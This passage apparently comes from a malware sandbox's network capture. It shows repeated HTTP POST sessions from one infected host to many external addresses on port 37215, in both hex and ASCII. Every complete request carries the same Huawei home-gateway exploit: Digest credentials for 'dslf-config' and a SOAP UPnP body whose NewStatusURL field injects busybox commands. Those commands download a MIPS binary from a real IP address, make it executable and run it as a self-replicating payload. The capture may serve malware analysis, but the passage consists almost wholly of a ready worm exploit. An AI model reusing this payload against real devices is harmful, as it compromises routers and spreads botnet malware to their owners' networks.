6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  203192.168.2.134230847.12.204.4837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666392088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  204192.168.2.135598441.191.96.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666865110 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  205192.168.2.134434241.214.112.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666929960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  206192.168.2.1355614157.30.83.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666934013 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  207192.168.2.1352818157.106.246.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666989088 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  208192.168.2.1339644186.117.96.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666990995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  209192.168.2.133524441.180.32.17137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.666990995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  210192.168.2.1348916197.159.121.2737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667006016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  211192.168.2.1355154197.196.49.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667088985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  212192.168.2.1346632157.78.46.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667089939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  213192.168.2.1343530157.96.87.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667092085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
